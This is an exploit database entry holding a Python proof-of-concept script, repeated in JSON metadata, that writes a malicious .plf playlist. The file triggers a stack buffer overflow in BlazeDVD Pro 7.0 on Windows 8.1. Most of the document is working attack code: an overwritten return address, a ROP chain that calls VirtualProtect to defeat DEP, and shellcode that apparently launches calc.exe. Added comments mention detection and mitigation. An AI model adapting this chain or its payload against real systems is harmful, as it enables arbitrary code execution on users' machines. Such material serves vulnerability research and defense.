ID EXPLOITPACK:55B541AABE9FEC44813C0D8B453FED71
Type exploitpack
Reporter Giovanni Bartolomucci
Modified 2014-08-12T00:00:00
Description
BlazeDVD Pro Player 7.0 - .plf Direct RET Local Stack Buffer Overflow
# BlazeDVD Pro v7.0 - (.plf) Stack Based Buffer Overflow (direct RET) - ASLR/DEP bypass on Win8.1 Pro
# Date: Mon, Aug 11 2014 12:58:06 GMT
# Exploit Author: Giovanni Bartolomucci
# Vendor Homepage: http://www.blazevideo.com/
# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
# Version: 7.0.0.0
# Tested on: Windows 8.1 Pro
# h/t to corelanc0d3r and b33f for their tutorials
#!/usr/bin/python
import sys, struct
# Output path of the crafted playlist. Note that `file` shadows the Python 2
# builtin of the same name; harmless in this flat script, but avoid elsewhere.
file = "calc.plf"
# Layout of the crafted buffer: 260 filler bytes up to the saved return address
# (the "direct RET" overwrite named in the title), the 4-byte replacement EIP,
# then 24 more filler bytes before the ROP chain starts.
junk1 = "\x41"*260
# Replacement return address. Presumably a gadget inside Configuration.dll like
# the entries below (same 0x603xxxxx range) -- the original does not say.
neweip = "\x5b\x51\x32\x60"
junk2 = "\x41"*24
# ROP chain: 26 little-endian 4-byte entries (104 bytes). Every address is
# hard-coded, so the chain only works while Configuration.dll and
# MediaPlayerCtrl.dll load at the bases the author observed on Win 8.1 Pro; the
# "ASLR/DEP bypass" of the header depends on those modules not being rebased.
# Defensive angle: enforcing ASLR on these modules (mandatory ASLR / rebasing),
# or simply not opening untrusted .plf files, would break this chain.
# Per the original per-line comments the chain ends in PUSHAD # RETN, which
# uses the prepared registers to call VirtualProtect() via the
# MediaPlayerCtrl.dll IAT pointer, after which execution reaches `shellcode`.
rop = "\x41\x47\x32\x60" # POP EBP # RETN [Configuration.dll]
rop += "\xb5\x59\x33\x60" # &(PUSH ESP # RET 0x0C) [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RET [Configuration.dll]
rop += "\x91\x11\x11\x11" # Value to be subtracted, will become 0x000000080
rop += "\x39\x03\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\xda\x6d\x32\x60" # SUB EAX,ECX # RETN [Configuration.dll]
rop += "\x7d\x41\x32\x60" # XCHG EAX,EBX # XOR AL,60 # RETN [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x47\x98\x31\x60" # Junk R address
rop += "\x47\x98\x31\x60" # POP EDX # ADD AL,BYTE PTR ES:[EAX] # NOP # NOP # NOP # NOP # NOP # MOV EAX,Configur.60346A70 # RETN [Configuration.dll]
rop += "\x51\x11\x11\x11" # Value to be subtracted, will become 0x000000040
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\x78\x8b\x30\x60" # SUB EDX,EAX # XOR EAX,EAX # CMP ECX,EDX # SETG AL # RETN 0x04 [Configuration.dll]
rop += "\x8c\xf0\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x41\x41\x41\x41" # Junk
rop += "\x0b\x17\x36\x60" # & Writable location [Configuration.dll]
rop += "\xee\x78\x32\x60" # POP EDI # RETN [Configuration.dll]
rop += "\x09\x48\x32\x60" # RETN (ROP NOP) [Configuration.dll]
rop += "\x65\x08\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\xcc\x42\x05\x64" # ptr to &VirtualProtect() [IAT MediaPlayerCtrl.dll]
rop += "\xed\xd6\x33\x60" # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]
rop += "\xa2\x92\x32\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x90\x90\x90\x90" # NOP
rop += "\x28\xc3\x33\x60" # PUSHAD # RETN [Configuration.dll]
# Payload, 80 bytes. The 4 bytes pushed near the start (0x63 0x61 0x6c 0x63)
# spell "calc", consistent with the output filename, so this presumably
# launches calc.exe as the proof of concept -- not verified here. The final
# byte 0xCC is INT3, so the process traps/crashes once the payload has run
# rather than returning cleanly.
shellcode = ("\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63"
"\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
"\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30"
"\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78"
"\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
"\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E"
"\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\xCC")
# Assemble the 472-byte (260 + 4 + 24 + 104 + 80) file body. Python 2 `str`
# semantics are assumed throughout: each "\xNN" escape is one raw byte.
# Detection angle: a playlist whose bulk is a 260-byte run of 0x41 followed by
# little-endian pointers is not something a legitimate .plf would be expected
# to contain.
exploit = junk1 + neweip + junk2 + rop + shellcode
# Plain open/write/close with no error handling; a failure to open the path
# raises and leaves no partial file behind.
writeFile = open(file, "w")
writeFile.write(exploit)
writeFile.close()
{"lastseen": "2020-04-01T19:04:06", "references": [], "description": "\nBlazeDVD Pro Player 7.0 - .plf Direct RET Local Stack Buffer Overflow", "edition": 1, "reporter": "Giovanni Bartolomucci", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2014-08-12T00:00:00", "title": "BlazeDVD Pro Player 7.0 - .plf Direct RET Local Stack Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:06", "rev": 2}, "score": {"value": 0.3, "vector": "NONE", "modified": "2020-04-01T19:04:06", "rev": 2}, "vulnersScore": 0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2014-08-12T00:00:00", "id": "EXPLOITPACK:55B541AABE9FEC44813C0D8B453FED71", "href": "", "viewCount": 1, "sourceData": "# BlazeDVD Pro v7.0 - (.plf) Stack Based Buffer Overflow (direct RET) - ALSR/DEP bypass on Win8.1 Pro\n# Date: Mon, Aug 11 2014 12:58:06 GMT\n# Exploit Author: Giovanni Bartolomucci\n# Vendor Homepage: http://www.blazevideo.com/\n# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe\n# Version: 7.0.0.0\n# Tested on: Windows 8.1 Pro\n# h/t to corelanc0d3r and b33f for their tutorials\n\n#!/usr/bin/python\n \nimport sys, struct\n \nfile = \"calc.plf\"\n\njunk1 = \"\\x41\"*260\nneweip = \"\\x5b\\x51\\x32\\x60\"\njunk2 = \"\\x41\"*24\n\nrop = \"\\x41\\x47\\x32\\x60\" # POP EBP # RETN [Configuration.dll]\nrop += \"\\xb5\\x59\\x33\\x60\" # &(PUSH ESP # RET 0x0C) [Configuration.dll]\nrop += \"\\xf6\\x07\\x33\\x60\" # POP EAX # RET [Configuration.dll]\nrop += \"\\x91\\x11\\x11\\x11\" # Value to be subtracted, will become 0x000000080\nrop += \"\\x39\\x03\\x33\\x60\" # POP ECX # RETN [Configuration.dll]\nrop += \"\\x11\\x11\\x11\\x11\" # Value to subtract\nrop += \"\\xda\\x6d\\x32\\x60\" # SUB EAX,ECX # RETN [Configuration.dll]\nrop += \"\\x7d\\x41\\x32\\x60\" # XCHG EAX,EBX # XOR AL,60 # RETN [Configuration.dll]\nrop += \"\\xf6\\x07\\x33\\x60\" # POP EAX # RETN [Configuration.dll]\nrop += 
\"\\x47\\x98\\x31\\x60\" # Junk R address\nrop += \"\\x47\\x98\\x31\\x60\" # POP EDX # ADD AL,BYTE PTR ES:[EAX] # NOP # NOP # NOP # NOP # NOP # MOV EAX,Configur.60346A70 # RETN [Configuration.dll]\nrop += \"\\x51\\x11\\x11\\x11\" # Value to be subtracted, will become 0x000000040\nrop += \"\\xf6\\x07\\x33\\x60\" # POP EAX # RETN [Configuration.dll]\nrop += \"\\x11\\x11\\x11\\x11\" # Value to subtract\nrop += \"\\x78\\x8b\\x30\\x60\" # SUB EDX,EAX # XOR EAX,EAX # CMP ECX,EDX # SETG AL # RETN 0x04 [Configuration.dll]\nrop += \"\\x8c\\xf0\\x33\\x60\" # POP ECX # RETN [Configuration.dll]\nrop += \"\\x41\\x41\\x41\\x41\" # Junk\nrop += \"\\x0b\\x17\\x36\\x60\" # & Writable location [Configuration.dll]\nrop += \"\\xee\\x78\\x32\\x60\" # POP EDI # RETN [Configuration.dll]\nrop += \"\\x09\\x48\\x32\\x60\" # RETN (ROP NOP) [Configuration.dll]\nrop += \"\\x65\\x08\\x33\\x60\" # POP EAX # RETN [Configuration.dll]\nrop += \"\\xcc\\x42\\x05\\x64\" # ptr to &VirtualProtect() [IAT MediaPlayerCtrl.dll]\nrop += \"\\xed\\xd6\\x33\\x60\" # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]\nrop += \"\\xa2\\x92\\x32\\x60\" # POP EAX # RETN [Configuration.dll]\nrop += \"\\x90\\x90\\x90\\x90\" # NOP\nrop += \"\\x28\\xc3\\x33\\x60\" # PUSHAD # RETN [Configuration.dll]\n\nshellcode = (\"\\x66\\x81\\xE4\\xFC\\xFF\\x31\\xD2\\x52\\x68\\x63\"\n \"\\x61\\x6C\\x63\\x89\\xE6\\x52\\x56\\x64\\x8B\\x72\"\n \"\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x0C\\xAD\\x8B\\x30\"\n \"\\x8B\\x7E\\x18\\x8B\\x5F\\x3C\\x8B\\x5C\\x1F\\x78\"\n \"\\x8B\\x74\\x1F\\x20\\x01\\xFE\\x8B\\x4C\\x1F\\x24\"\n \"\\x01\\xF9\\x42\\xAD\\x81\\x3C\\x07\\x57\\x69\\x6E\"\n \"\\x45\\x75\\xF5\\x0F\\xB7\\x54\\x51\\xFE\\x8B\\x74\"\n \"\\x1F\\x1C\\x01\\xFE\\x03\\x3C\\x96\\xFF\\xD7\\xCC\")\n\nexploit = junk1 + neweip + junk2 + rop + shellcode\n \nwriteFile = open(file, \"w\")\nwriteFile.write(exploit)\nwriteFile.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}
{}